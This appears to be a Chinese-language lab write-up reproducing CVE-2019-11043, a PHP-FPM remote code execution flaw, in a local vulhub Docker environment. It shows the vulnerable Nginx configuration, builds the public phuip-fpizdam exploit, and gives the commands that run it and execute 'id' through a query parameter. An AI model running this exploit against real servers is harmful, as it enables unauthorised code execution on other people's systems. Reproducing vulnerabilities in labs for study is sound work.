一、漏洞描述

  CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

  向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

  该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}

  攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。

二、影响范围

  在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

● PHP 7.0 版本 
● PHP 7.1 版本
● PHP 7.2 版本
● PHP 7.3 版本

三、漏洞复现

  使用 P 牛的 docker 环境进行复现:

  PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

1、安装docker、golang环境

sudo apt-get install docker docker-compose
sudo apt install golang

2、搭建漏洞环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 && docker-compose up -d

img

​   启动环境之后,就可以看到漏洞环境的默认页面。在此为http://127.0.0.1:8080/index.php

img

3、安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v && go build

img

  报错原因:默认使用的是proxy.golang.org,在国内无法访问

  换一个国内能访问的代理地址:https://goproxy.cn。重新执行命令即可

go env -w GOPROXY=https://goproxy.cn
go get -v && go build

img

img

4、漏洞利用

go run . "http://127.0.0.1:8080/index.php"

img

  访问http://127.0.0.1/index.php?a=id

注意,因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程。

img

img

img

curl ip.sb为Linux中查询公网IP的命令

四、参考链接